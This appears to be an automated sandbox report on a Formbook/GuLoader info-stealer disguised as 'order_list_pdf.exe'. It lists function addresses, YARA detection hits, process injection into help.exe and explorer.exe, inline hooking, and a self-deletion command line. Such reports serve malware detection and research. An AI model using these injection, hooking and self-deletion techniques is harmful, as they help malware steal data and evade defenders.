      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402F020_2_00402F02
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040371B0_2_0040371B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402F1D0_2_00402F1D
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403F300_2_00403F30
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402F360_2_00402F36
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402FC30_2_00402FC3
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004027CC0_2_004027CC
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403FD80_2_00403FD8
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004027D90_2_004027D9
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004037E80_2_004037E8
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403FF00_2_00403FF0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004027F30_2_004027F3
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004037F90_2_004037F9
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004037870_2_00403787
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403F890_2_00403F89
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402F940_2_00402F94
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403FBB0_2_00403FBB
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040EFBB0_2_0040EFBB
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C66114_2_1E0C6611
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0B76404_2_1E0B7640
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C4E614_2_1E0C4E61
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E15CE664_2_1E15CE66
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C5E704_2_1E0C5E70
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E153E964_2_1E153E96
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E1626F84_2_1E1626F8
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E1617464_2_1E161746
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E1527824_2_1E152782
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0B57904_2_1E0B5790
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E161FCE4_2_1E161FCE
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0A740C4_2_1E0A740C
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0B14104_2_1E0B1410
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E14F42B4_2_1E14F42B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C547E4_2_1E0C547E
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E1534904_2_1E153490
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E161C9F4_2_1E161C9F
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E1544EF4_2_1E1544EF
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E151D1B4_2_1E151D1B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E1625194_2_1E162519
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E13C53F4_2_1E13C53F
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0B15304_2_1E0B1530
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E090D404_2_1E090D40
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E15E5814_2_1E15E581
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E15D5D24_2_1E15D5D2
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E14FDDB4_2_1E14FDDB
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E141DE34_2_1E141DE3
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E16E2144_2_1E16E214
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E150A024_2_1E150A02
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C523D4_2_1E0C523D
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C4A5B4_2_1E0C4A5B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E161A994_2_1E161A99
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0B42B04_2_1E0B42B0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E1622DD4_2_1E1622DD
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0BFB404_2_1E0BFB40
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C4B964_2_1E0C4B96
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C63C24_2_1E0C63C2
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E09EBE04_2_1E09EBE0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E15D0164_2_1E15D016
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0CE0204_2_1E0CE020
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C00214_2_1E0C0021
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C10704_2_1E0C1070
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0AA0804_2_1E0AA080
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E1418B64_2_1E1418B6
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C48CB4_2_1E0C48CB
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E1628E84_2_1E1628E8
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C71104_2_1E0C7110
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C594B4_2_1E0C594B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C61804_2_1E0C6180
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E16D9BE4_2_1E16D9BE
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E1619E24_2_1E1619E2
      Source: C:\Windows\explorer.exeCode function: 5_2_05FF98525_2_05FF9852
      Source: C:\Windows\explorer.exeCode function: 5_2_05FF1CF25_2_05FF1CF2
      Source: C:\Windows\explorer.exeCode function: 5_2_05FF00725_2_05FF0072
      Source: C:\Windows\explorer.exeCode function: 5_2_05FF00695_2_05FF0069
      Source: C:\Windows\explorer.exeCode function: 5_2_05FF6F525_2_05FF6F52
      Source: C:\Windows\explorer.exeCode function: 5_2_05FF4AF25_2_05FF4AF2
      Source: C:\Windows\explorer.exeCode function: 5_2_05FF4AEF5_2_05FF4AEF
      Source: C:\Windows\explorer.exeCode function: 5_2_05FFCAAC5_2_05FFCAAC
      Source: C:\Windows\explorer.exeCode function: 5_2_05FF86795_2_05FF8679
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031CFB407_2_031CFB40
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031D63C27_2_031D63C2
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031AEBE07_2_031AEBE0
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031D523D7_2_031D523D
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_03260A027_2_03260A02
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0327E2147_2_0327E214
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031D4A5B7_2_031D4A5B
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031C42B07_2_031C42B0
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_03271A997_2_03271A99
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_032722DD7_2_032722DD
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031D594B7_2_031D594B
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0327D9BE7_2_0327D9BE
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031D61807_2_031D6180
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_032719E27_2_032719E2
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0326D0167_2_0326D016
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031D00217_2_031D0021
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031DE0207_2_031DE020
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_032518B67_2_032518B6
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031BA0807_2_031BA080
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_032728E87_2_032728E8
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031D48CB7_2_031D48CB
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_032717467_2_03271746
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031C57907_2_031C5790
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_032627827_2_03262782
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_03271FCE7_2_03271FCE
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031D66117_2_031D6611
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0326CE667_2_0326CE66
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031C76407_2_031C7640
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031D5E707_2_031D5E70
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031D4E617_2_031D4E61
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_03263E967_2_03263E96
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_032726F87_2_032726F8
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0324C53F7_2_0324C53F
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_032725197_2_03272519
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031A0D407_2_031A0D40
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0326E5817_2_0326E581
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_03251DE37_2_03251DE3
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0326D5D27_2_0326D5D2
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0325FDDB7_2_0325FDDB
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0325F42B7_2_0325F42B
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031B740C7_2_031B740C
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031D547E7_2_031D547E
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_032634907_2_03263490
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_03271C9F7_2_03271C9F
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_032644EF7_2_032644EF
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B0B0837_2_00B0B083
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00AF790B7_2_00AF790B
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00AF79107_2_00AF7910
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B0AAB87_2_00B0AAB8
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B09CE67_2_00B09CE6
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B0B54D7_2_00B0B54D
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: String function: 1E0EDDE8 appears 33 times
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: String function: 1E09B0E0 appears 168 times
      Source: C:\Windows\SysWOW64\help.exeCode function: String function: 031AB0E0 appears 162 times
      Source: order_list_pdf.exe, 00000000.00000002.559323075.000000000041A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameobj2Isenkrmmerens7.exe vs order_list_pdf.exe
      Source: order_list_pdf.exe, 00000000.00000002.560181752.0000000002050000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs order_list_pdf.exe
      Source: order_list_pdf.exe, 00000000.00000002.560389276.00000000020C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameobj2Isenkrmmerens7.exeFE2X vs order_list_pdf.exe
      Source: order_list_pdf.exe, 00000004.00000002.672015263.000000001DBF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs order_list_pdf.exe
      Source: order_list_pdf.exe, 00000004.00000002.673714450.000000001E31F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs order_list_pdf.exe
      Source: order_list_pdf.exe, 00000004.00000003.663821755.00000000009F2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs order_list_pdf.exe
      Source: order_list_pdf.exe, 00000004.00000000.557397549.000000000041A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameobj2Isenkrmmerens7.exe vs order_list_pdf.exe
      Source: order_list_pdf.exeBinary or memory string: OriginalFilenameobj2Isenkrmmerens7.exe vs order_list_pdf.exe
      Source: 00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.842795531.00000000036BE000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000004.00000002.672129627.000000001DE50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.672129627.000000001DE50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.839035767.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.839035767.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.839087655.0000000000B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.839087655.0000000000B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.839927203.0000000002CCC000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000007.00000002.839147457.0000000000B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.839147457.0000000000B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/0@2/2
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4516:120:WilError_01
      Source: C:\Users\user\Desktop\order_list_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\~DF4589BA9E930093E8.TMPJump to behavior
      Source: order_list_pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\order_list_pdf.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\order_list_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\order_list_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\order_list_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\help.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: order_list_pdf.exeVirustotal: Detection: 59%
      Source: order_list_pdf.exeMetadefender: Detection: 13%
      Source: order_list_pdf.exeReversingLabs: Detection: 58%
      Source: unknownProcess created: C:\Users\user\Desktop\order_list_pdf.exe 'C:\Users\user\Desktop\order_list_pdf.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\order_list_pdf.exe 'C:\Users\user\Desktop\order_list_pdf.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\order_list_pdf.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\order_list_pdf.exeProcess created: C:\Users\user\Desktop\order_list_pdf.exe 'C:\Users\user\Desktop\order_list_pdf.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\order_list_pdf.exe'Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000002.875626376.000000000C2F0000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: order_list_pdf.exe, 00000004.00000002.673209154.000000001E18F000.00000040.00000001.sdmp, help.exe, 00000007.00000002.840304446.0000000003180000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: order_list_pdf.exe, help.exe
      Source: Binary string: help.pdbGCTL source: order_list_pdf.exe, 00000004.00000002.664875944.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: help.pdb source: order_list_pdf.exe, 00000004.00000002.664875944.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000002.875626376.000000000C2F0000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: order_list_pdf.exe PID: 3644, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: order_list_pdf.exe PID: 4496, type: MEMORY
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004098DD push ss; retf 0_2_0040990B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00409943 push ss; retf 0_2_00409A0B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00407124 push ebx; iretd 0_2_00407125
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00407127 push ebx; retf 0_2_00407129
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004099DD push ss; retf 0_2_00409A0B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00407B38 push edi; retf 0_2_00407B4E
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00408C6B push ebp; iretd 0_2_00408C6C
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004054DB push ds; retf 0_2_00405507
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040B50F push ebp; iretd 0_2_0040B510
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040BDB9 push esi; iretd 0_2_0040BDBA
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040BEDD push esi; iretd 0_2_0040BEDE
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004097B9 push ss; retf 0_2_0040990B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_02095323 push ebp; retf 0_2_0209534B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0209542F push ebp; retf 0_2_0209544B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0EDE2D push ecx; ret 4_2_1E0EDE40
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_031FDE2D push ecx; ret 7_2_031FDE40
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B09AA2 push eax; ret 7_2_00B09AA8
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B09AAB push eax; ret 7_2_00B09B12
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B07A39 push ebp; iretd 7_2_00B07A3A
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B09A55 push eax; ret 7_2_00B09AA8
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B09B0C push eax; ret 7_2_00B09B12
      Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B0AE81 push cs; ret 7_2_00B0AE87

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xF3 0x32
      Source: C:\Users\user\Desktop\order_list_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\order_list_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\order_list_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\order_list_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\order_list_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\order_list_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\order_list_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion: